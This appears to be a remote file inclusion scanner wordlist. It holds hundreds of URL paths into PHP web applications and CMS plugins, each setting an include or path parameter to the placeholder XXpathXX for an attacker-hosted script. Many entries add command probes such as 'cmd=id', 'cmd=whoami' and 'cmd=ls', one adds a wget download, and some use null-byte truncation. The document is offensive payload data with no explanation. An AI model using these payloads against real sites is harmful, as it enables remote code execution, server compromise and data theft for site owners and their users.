/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=XXpathXX
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=XXpathXX
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=XXpathXX
/administrator/components/com_webring/admin.webring.docs.php?component_dir=XXpathXX?
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=XXpathXX
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=XXpathXX?
/administrator/menu_add.php?site_absolute_path=XXpathXX?
/administrator/menu_operation.php?site_absolute_path=XXpathXX?
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=XXpathXX
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=XXpathXX?
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=XXpathXX
/adodb/adodb-pear.inc.php?ourlinux_root_path=XXpathXX
/adodb/adodb.inc.php?path=XXpathXX
/advanced_comment_system/admin.php?ACS_path=XXpathXX?
/advanced_comment_system/index.php?ACS_path=XXpathXX?
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=XXpathXX?
/agenda.php3?rootagenda=XXpathXX
/agenda2.php3?rootagenda=XXpathXX
/aides/index.php?page=XXpathXX?
/ains_main.php?ains_path=XXpathXX
/ajax/loadsplash.php?full_path=XXpathXX
/ajouter.php?include=XXpathXX?
/akarru.gui/main_content.php?bm_content=XXpathXX
/akocomments.php?mosConfig_absolute_path=XXpathXX
/amazon/cart.php?cmd=add&asin=XXpathXX
/amazon/index.php?lang=XXpathXX
/amazon/info.php?asin=XXpathXX
/annonce.php?page=XXpathXX?&cmd=id
/announcements.php?phpraid_dir=XXpathXX
/anzagien.php?config[root_ordner]=XXpathXX?cmd=id
/apbn/templates/head.php?APB_SETTINGS[template_path]=XXpathXX
/api.php?t_path_core=XXpathXX?&cmd=id
/apps/apps.php?app=XXpathXX
/appserv/main.php?appserv_root=XXpathXX
/arab3upload/customize.php?path=XXpathXX?&cmd=pwd
/arab3upload/initialize.php?path=XXpathXX?&cmd=pwd
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=XXpathXX
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=XXpathXX
/arash_lib/include/edit.inc.php?arashlib_dir=XXpathXX
/arash_lib/include/list_features.inc.php?arashlib_dir=XXpathXX
/archive.php?scriptpath=XXpathXX?
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=XXpathXX%00
/artlist.php?root_path=XXpathXX
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=XXpathXX?cmd
/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
/athena.php?athena_dir=XXpathXX
/auction/auction_common.php?phpbb_root_path=XXpathXX
/auction/includes/converter.inc.php?include_path=XXpathXX?
/auction/includes/messages.inc.php?include_path=XXpathXX?
/auction/includes/settings.inc.php?include_path=XXpathXX?
/auction/phpAdsNew/view.inc.php?phpAds_path=XXpathXX
/auth.cookie.inc.php?da_path=XXpathXX
/auth.header.inc.php?da_path=XXpathXX
/auth.sessions.inc.php?da_path=XXpathXX
/auth/auth.php?phpbb_root_path=XXpathXX
/auth/auth_phpbb/phpbb_root_path=XXpathXX
/authenticate.php?default_path_for_themes=XXpathXX?
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=XXpathXX
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=XXpathXX
/auto_check_renewals.php?installed_config_file=XXpathXX?cmd=ls
/autoindex.php?cfg_file=XXpathXX?
/awzmb/adminhelp.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/help.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=XXpathXX
/axoverzicht.cgi?maand=XXpathXX
/b2-tools/gm-2-b2.php?b2inc=XXpathXX
/b2verifauth.php?index=XXpathXX?
/backend/addons/links/index.php?PATH=XXpathXX
/basebuilder/src/main.inc.php?mj_config[src_path]=XXpathXX???
/bb_admin.php?includeFooter=XXpathXX
/beacon/language/1/splash.lang.php?languagePath=XXpathXX
/beacon/language/1/splash.lang.php?languagePath=XXpathXX?
/belegungsplan/jahresuebersicht.inc.php?root=XXpathXX
/belegungsplan/monatsuebersicht.inc.php?root=XXpathXX
/belegungsplan/tagesuebersicht.inc.php?root=XXpathXX
/belegungsplan/wochenuebersicht.inc.php?root=XXpathXX
/bemarket/postscript/postscript.php?p_mode=XXpathXX
/biblioteca/bib_form.php?CLASSPATH=XXpathXX
/biblioteca/bib_pldetails.php?CLASSPATH=XXpathXX
/biblioteca/bib_plform.php?CLASSPATH=XXpathXX
/biblioteca/bib_plsearchc.php?CLASSPATH=XXpathXX
/biblioteca/bib_plsearchs.php?CLASSPATH=XXpathXX
/biblioteca/bib_save.php?CLASSPATH=XXpathXX
/biblioteca/bib_searchc.php?CLASSPATH=XXpathXX
/biblioteca/bib_searchs.php?CLASSPATH=XXpathXX
/biblioteca/edi_form.php?CLASSPATH=XXpathXX
/biblioteca/edi_save.php?CLASSPATH=XXpathXX
/biblioteca/gen_form.php?CLASSPATH=XXpathXX
/biblioteca/gen_save.php?CLASSPATH=XXpathXX
/biblioteca/lin_form.php?CLASSPATH=XXpathXX
/biblioteca/lin_save.php?CLASSPATH=XXpathXX
/biblioteca/luo_form.php?CLASSPATH=XXpathXX
/biblioteca/luo_save.php?CLASSPATH=XXpathXX
/biblioteca/sog_form.php?CLASSPATH=XXpathXX
/biblioteca/sog_save.php?CLASSPATH=XXpathXX
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX?
/bild.php?config[root_ordner]=XXpathXX?&cmd=id
/bin/qte_init.php?qte_root=XXpathXX?
/bingoserver.php3?response_dir=XXpathXX
/block.php?Include=XXpathXX
/blocks/birthday.php?full_path=XXpathXX
/blocks/events.php?full_path=XXpathXX
/blocks/help.php?full_path=XXpathXX
/blogcms/admin/media.php?DIR_LIBS=XXpathXX?
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=XXpathXX?
/blogcms/index.php?DIR_PLUGINS=XXpathXX?
/board/post.php?qb_path=XXpathXX
/boitenews4/index.php?url_index=XXpathXX?
/books/allbooks.php?home=XXpathXX
/books/home.php?home=XXpathXX
/books/mybooks.php?home=XXpathXX
/bp_ncom.php?bnrep=XXpathXX
/bp_ncom.php?bnrep=XXpathXX?
/bp_news.php?bnrep=XXpathXX
/bridge/enigma/E2_header.inc.php?boarddir=XXpathXX?
/bridge/yabbse.inc.php?sourcedir=XXpathXX
/bridges/SMF/logout.php?path_to_smf=XXpathXX
/bu/bu_cache.php?bu_dir=XXpathXX?
/bu/bu_claro.php?bu_dir=XXpathXX?
/bu/bu_parse.php?bu_dir=XXpathXX?
/bu/process.php?bu_dir=XXpathXX?
/buddy.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/builddb.php?env_dir=XXpathXX
/button/settings_sql.php?path=XXpathXX
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=XXpathXX?
/cal.func.php?dir_edge_lang=XXpathXX
/calcul-page.php?home=XXpathXX
/calendar.php?cfg_dir=XXpathXX?
/calendar.php?lang=XXpathXX
/calendar.php?path_to_calendar=XXpathXX
/calendar.php?vwar_root=XXpathXX?
/calendar/demo/index.php?date=&v=XXpathXX?
/calendar/payment.php?insPath=XXpathXX
/calendario/cal_insert.php?CLASSPATH=XXpathXX
/calendario/cal_save.php?CLASSPATH=XXpathXX
/calendario/cal_saveactivity.php?CLASSPATH=XXpathXX
/cart.php?lang_list=XXpathXX
/cart_content.php?cart_isp_root=XXpathXX
/catalogg/inludes/include_once.php?include_file=XXpathXX
/catalogshop.php?mosConfig_absolute_path=XXpathXX
/cdsagenda/modification/SendAlertEmail.php?AGE=XXpathXX?
/cfagcms/themes/default/index.php?main=XXpathXX
/ch_readalso.php?read_xml_include=XXpathXX
/challenge.php?vwar_root=XXpathXX
/change_preferences2.php?target=XXpathXX?
/chat.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/chat.php?my[root]=XXpathXX?cm=id
/chat/adminips.php?banned_file=XXpathXX
/chat/users_popupL.php3?From=XXpathXX
/checkout.php?abs_path=XXpathXX
/checkout.php?abs_path=XXpathXX?
/ciamos_path/modules/forum/include/config.php?module_cache_path='XXpathXX'
/circ.php?include_path=XXpathXX?
/circolari/cir_save.php?CLASSPATH=XXpathXX
/citywriter/head.php?path=XXpathXX?
/cl_files/index.php?path_to_calendar=XXpathXX?
/claroline/auth/ldap/authldap.php?includePath=XXpathXX
/claroline/phpbb/page_tail.php?includePath=XXpathXX
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=XXpathXX?
/class.mysql.php?path_to_bt_dir=XXpathXX
/class/Wiki/Wiki.php?c_node[class_path]=XXpathXX
/class/jpcache/jpcache.php?_PSL[classdir]=XXpathXX?exec=uname
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=XXpathXX
/classes/Cache.class.php?rootdir=XXpathXX?
/classes/Customer.class.php?rootdir=XXpathXX?
/classes/Performance.class.php?rootdir=XXpathXX?
/classes/Project.class.php?rootdir=XXpathXX?
/classes/Representative.class.php?rootdir=XXpathXX?
/classes/User.class.php?rootdir=XXpathXX?
/classes/admin_o.php?absolutepath=XXpathXX
/classes/adodbt/sql.php?classes_dir=XXpathXX
/classes/adodbt/sql.php?classes_dir=XXpathXX?
/classes/board_o.php?absolutepath=XXpathXX
/classes/class_admin.php?PathToComment=XXpathXX?
/classes/class_comments.php?PathToComment=XXpathXX?
/classes/class_mail.inc.php?path_to_folder=XXpathXX
/classes/common.php?rootdir=XXpathXX?
/classes/core/language.php?rootdir=XXpathXX
/classes/dev_o.php?absolutepath=XXpathXX
/classes/file_o.php?absolutepath=XXpathXX
/classes/html/com_articles.php?absolute_path=XXpathXX
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
/classes/query.class.php?baseDir=XXpathXX
/classes/tech_o.php?absolutepath=XXpathXX
/classified.php?insPath=XXpathXX
/classified_right.php?language_dir=XXpathXX
/classifieds/index.php?lowerTemplate=XXpathXX
/clear.php?bibtexrootrel=XXpathXX?
/clearinfo.php?bibtexrootrel=XXpathXX?
/click.php?dir=XXpathXX?
/client.php?dir=XXpathXX
/client/faq_1/PageController.php?dir=XXpathXX
/clients/index.php?src=XXpathXX
/cls_fast_template.php?fname=XXpathXX
/cm68news/engine/oldnews.inc.php?addpath=XXpathXX?&
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=XXpathXX?
/cms/meetweb/classes/ManagerResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegForm.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegRightsResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/modules.php?root_path=XXpathXX
/cms/modules/form.lib.php?sourceFolder=XXpathXX?
/cms/system/openengine.php?oe_classpath=XXpathXX???
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=XXpathXX?
/cn_config.php?tpath=XXpathXX?
/coast/header.php?sections_file=XXpathXX?
/code/berylium-classes.php?beryliumroot=XXpathXX?
/code/display.php?admindir=XXpathXX?
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=XXpathXX
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=XXpathXX?
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/comments.php?AMG_serverpath=XXpathXX
/comments.php?scriptpath=XXpathXX?
/common.inc.php?CFG[libdir]=XXpathXX
/common.inc.php?CFG[libdir]=XXpathXX?
/common.inc.php?base_path=XXpathXX
/common.php?db_file=XXpathXX
/common.php?dir=XXpathXX
/common.php?ezt_root_path=XXpathXX?
/common.php?include_path=XXpathXX
/common.php?livealbum_dir=XXpathXX?
/common.php?locale=XXpathXX
/common.php?phpht_real_path=XXpathXX?
/common/db.php?commonpath=XXpathXX?
/common/func.php?CommonAbsD=XXpathXX?
/common/func.php?CommonAbsDir=XXpathXX
/community/Offline.php?sourcedir=XXpathXX?
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=XXpathXX
/components/calendar/com_calendar.php?absolute_path=XXpathXX?
/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=XXpathXX
/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=XXpathXX
/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=XXpathXX
/components/com_articles.php?absolute_path=XXpathXX?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=XXpathXX
/components/com_calendar.php?absolute_path=XXpathXX?
/components/com_cpg/cpg.php?mosConfig_absolute_path=XXpathXX?
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=XXpathXX
/components/com_facileforms/facileforms.frame.php?ff_compath=XXpathXX
/components/com_forum/download.php?phpbb_root_path=XXpathXX
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=XXpathXX
/components/com_guestbook.php?absolute_path=XXpathXX?
/components/com_hashcash/server.php?mosConfig_absolute_path=XXpathXX?
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=XXpathXX
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=XXpathXX
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=XXpathXX
/components/com_joomlaboard/file_upload.php?sbp=XXpathXX?
/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=XXpathXX?
/components/com_lm/archive.php?mosConfig_absolute_path=XXpathXX?
/components/com_mambowiki/MamboLogin.php?IP=XXpathXX?
/components/com_minibb.php?absolute_path=XXpathXX
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=XXpathXX
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=XXpathXX
/components/com_mospray/scripts/admin.php?basedir=XXpathXX?&cmd=id
/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=XXpathXX
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=XXpathXX
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=XXpathXX?
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=XXpathXX
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=XXpathXX
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=XXpathXX?
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=XXpathXX
/components/com_smf/smf.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=XXpathXX
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=XXpathXX
/components/core/connect.php?language_path=XXpathXX
/components/minibb/bb_plugins.php?absolute_path=XXpathXX?
/components/minibb/index.php?absolute_path=XXpathXX?
/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
/compteur/mapage.php?chemin=XXpathXX
/conf.php?securelib=XXpathXX
/conf.php?securelib=XXpathXX?
/config.inc.php3?rel_path=XXpathXX
/config.inc.php?_path=XXpathXX
/config.inc.php?path_escape=XXpathXX
/config.inc.php?path_escape=XXpathXX%00
/config.php?full_path=XXpathXX?
/config.php?full_path_to_db=XXpathXX
/config.php?fullpath=XXpathXX
/config.php?incpath=XXpathXX
/config.php?path_to_root=XXpathXX
/config.php?rel_path=XXpathXX?
/config.php?returnpath=XXpathXX
/config.php?sql_language=XXpathXX?
/config.php?xcart_dir=XXpathXX?
/config/config_admin.php?INC=XXpathXX?
/config/config_main.php?INC=XXpathXX?
/config/config_member.php?INC=XXpathXX?
/config/dbutil.bck.php?confdir=XXpathXX
/config/mysql_config.php?INC=XXpathXX?
/config/sender.php?ROOT_PATH=XXpathXX?
/configuration.php?absolute_path=XXpathXX?
/confirmUnsubscription.php?output=XXpathXX
/connect.php?path=XXpathXX
/connexion.php?DOCUMENT_ROOT=XXpathXX?
/contact.php?blog_theme=XXpathXX
/contacts.php?cal_dir=XXpathXX
/contenido/external/frontend/news.php?cfg[path][includes]=XXpathXX
/content.php?content=XXpathXX
/content/admin.php?pwfile=XXpathXX
/content/content.php?fileloc=XXpathXX?
/content/delete.php?pwfile=XXpathXX
/content/modify.php?pwfile=XXpathXX
/content/modify_go.php?pwfile=XXpathXX
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=XXpathXX
/contrib/mx_glance_sdesc.php?mx_root_path=XXpathXX
/contrib/phpBB2/modules.php?phpbb_root_path=XXpathXX?
/controllers/MySQLController.php?baseDir=XXpathXX
/controllers/SQLController.php?baseDir=XXpathXX
/controllers/SetupController.php?baseDir=XXpathXX
/controllers/VideoController.php?baseDir=XXpathXX
/controllers/ViewController.php?baseDir=XXpathXX
/convert-date.php?cal_dir=XXpathXX
/convert/mvcw.php?step=1&vwar_root=XXpathXX
/convert/mvcw.php?vwar_root=XXpathXX
/core/admin/admin.php?p=admin&absoluteurlXXpathXX
/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlXXpathXX
/core/admin/categories_add.php?absoluteurlXXpathXX
/core/admin/categories_remove.php?absoluteurlXXpathXX
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlXXpathXX
/core/admin/editdel.php?p=admin&absoluteurlXXpathXX
/core/admin/ftpfeature.php?p=admin&absoluteurlXXpathXX
/core/admin/login.php?absoluteurlXXpathXX
/core/admin/pgRSSnews.php?absoluteurlXXpathXX
/core/admin/showcat.php?absoluteurlXXpathXX
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlXXpathXX
/core/archive_cat.php?absoluteurlXXpathXX
/core/archive_nocat.php?absoluteurlXXpathXX
/core/aural.php?site_absolute_path=XXpathXX
/core/aural.php?site_absolute_path=XXpathXX?&cmd=dir
/core/editor.php?editor_insert_bottom=XXpathXX
/core/includes.php?CMS_ROOT=XXpathXX?
/core/recent_list.php?absoluteurlXXpathXX
/corpo.php?pagina=XXpathXX
/cp2.php?securelib=XXpathXX?
/cpe/index.php?repertoire_config=XXpathXX
/crea.php?plancia=XXpathXX
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=XXpathXX?
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=XXpathXX?
/creat_news_all.php?language=XXpathXX
/create_file.php?target=XXpathXX?
/cron.php?ROOT_PATH=XXpathXX
/cron.php?include_path=XXpathXX?
/crontab/run_billing.php?config[include_dir]=XXpathXX?
/cross.php?url=XXpathXX
/custom_vars.php?sys[path_addon]=XXpathXX
/customer/product.php?xcart_dir=XXpathXX
/cwb/comanda.php?INCLUDE_PATH=XXpathXX?
/datei.php?config[root_ordner]=XXpathXX?&cmd=id
/db/PollDB.php?CONFIG_DATAREADERWRITER=XXpathXX?
/db/mysql/db.inc.php?SPL_CFG[dirroot]=XXpathXX?
/dbcommon/include.php?_APP_RELATIVE_PATH=XXpathXX
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=XXpathXX
/debugger.php?config_atkroot=XXpathXX
/decoder/gallery.php?ccms_library_path=XXpathXX
/decoder/markdown.php?ccms_library_path=XXpathXX
/defaults_setup.php?ROOT_PATH=XXpathXX?cmd=ls
/defines.php?WEBCHATPATH=XXpathXX?
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=XXpathXX&
/depouilg.php3?NomVote=XXpathXX?
/development.php?root_prefix=XXpathXX?
/dfcode.php?DFORUM_PATH=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX?
/dialog.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/dialogs/a.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/collorpicker.php?spaw_dir=XXpathXX&cmd=id
/dialogs/img.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/img_library.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/table.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/td.php?spaw_dir=XXpathXX?&cmd=id
/digitaleye_Path/module.php?menu=XXpathXX?
/dir/prepend.php?_PX_config[manager_path]=XXpathXX
/dir_thatware/config.php?root_path=XXpathXX'
/direct.php?rf=XXpathXX
/direction/index.php?repertoire_config=XXpathXX
/directory/index.php?path=XXpathXX
/display.php?pag=XXpathXX
/display.php?path=XXpathXX
/displayCategory.php?basepath=XXpathXX
/dix.php3?url_phpartenaire=XXpathXX
/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
/doc/admin/index.php?ptinclude=XXpathXX
/doceboCore/lib/lib.php?GLOBALS[where_framework]=XXpathXX
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=XXpathXX
/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=XXpathXX
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=XXpathXX
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=XXpathXX
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=XXpathXX
/docs/front-end-demo/cart2.php?workdir=XXpathXX?
/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=XXpathXX?&cmd=wget%20XXpathXX
/dosearch.php?RESPATH=XXpathXX
/download.php?root_prefix=XXpathXX?
/download_engine_V1.4.3/addmember.php?eng_dir=XXpathXX
/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=XXpathXX
/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=XXpathXX
/downstat1.8/chart.php?art=XXpathXX?
/dp_logs.php?HomeDir=XXpathXX
/eXPerience2/modules.php?file=XXpathXX
/ea-gBook/index_inc.php?inc_ordner=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/edit.php?javascript_path=XXpathXX?
/editor.php?newsfile=XXpathXX
/editprofile.php?pathtohomedir=XXpathXX?
/editsite.php?returnpath=XXpathXX
/editx/add_address.php?include_dir=XXpathXX
/elseif/contenus.php?contenus=XXpathXX
/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=XXpathXX
/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=XXpathXX
/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=XXpathXX
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=XXpathXX
/elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX
/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=XXpathXX
/email_subscribe.php?root_prefix=XXpathXX?
/embed/day.php?path=XXpathXX
/enc/content.php?Home_Path=XXpathXX?
/engine/Ajax/editnews.php?root_dir=XXpathXX
/engine/api/api.class.php?dle_config_api=XXpathXX?
/engine/engine.inc.php?absolute_path=XXpathXX
/engine/init.php?root_dir=XXpathXX
/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=XXpathXX?
/enth3/show_joined.php?path=XXpathXX
/environment.php?DIR_PREFIX=XXpathXX
/epal/index.php?view=XXpathXX?
/errors.php?error=XXpathXX
/errors/configmode.php?GALLERY_BASEDIR=XXpathXX
/errors/needinit.php?GALLERY_BASEDIR=XXpathXX
/errors/reconfigure.php?GALLERY_BASEDIR=XXpathXX
/errors/unconfigured.php?GALLERY_BASEDIR=XXpathXX
/es_custom_menu.php?files_dir=XXpathXX
/es_desp.php?files_dir=XXpathXX
/es_offer.php?files_dir=XXpathXX
/eshow.php?Config_rootdir=XXpathXX
/esupport/admin/autoclose.php?subd=XXpathXX?
/eva/index.php3?aide=XXpathXX?
/eva/index.php3?perso=XXpathXX
/eva/index.php?eva[caminho]=XXpathXX
/event.php?myevent_path=XXpathXX
/event_cal/module/embed/day.php?path=XXpathXX
/eventcal2.php.php?path_simpnews=XXpathXX
/eventscroller.php?path_simpnews=XXpathXX
/example-view/templates/article.php?globals[content_dir]=XXpathXX?
/example-view/templates/dates_list.php?globals[content_dir]=XXpathXX?
/example-view/templates/root.php?globals[content_dir]=XXpathXX?
/example.php?site=XXpathXX
/example/gamedemo/inc.functions.php?projectPath=XXpathXX?
/examplefile.php?bibtexrootrel=XXpathXX?
/examples/patExampleGen/bbcodeSource.php?example=XXpathXX
/exception/include.php?_APP_RELATIVE_PATH=XXpathXX
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=XXpathXX
/extras/mt.php?web_root=XXpathXX
/extras/poll/poll.php?file_newsportal=XXpathXX
/ezusermanager_pwd_forgott.php?ezUserManager_Path=XXpathXX
/faq.php?module_root_path=XXpathXX
/faq.php?phpbb_root_path=XXpathXX
/fckeditor/editor/dialog/fck_link.php?dirroot=XXpathXX
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=XXpathXX
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=XXpathXX?&cmd=id
/fcring.php?s_fuss=XXpathXX
/feed.php?config[root_ordner]=XXpathXX?&cmd=id
/feed/index2.php?m=XXpathXX
/files/amazon-bestsellers.php?CarpPath=XXpathXX
/files/carprss.php?CarpPath=XXpathXX
/files/compose-attach.php3?BSX_LIBDIR=XXpathXX
/files/compose-menu.php3?BSX_LIBDIR=XXpathXX
/files/compose-new.php3?BSX_LIBDIR=XXpathXX
/files/compose-send.php3?BSX_LIBDIR=XXpathXX
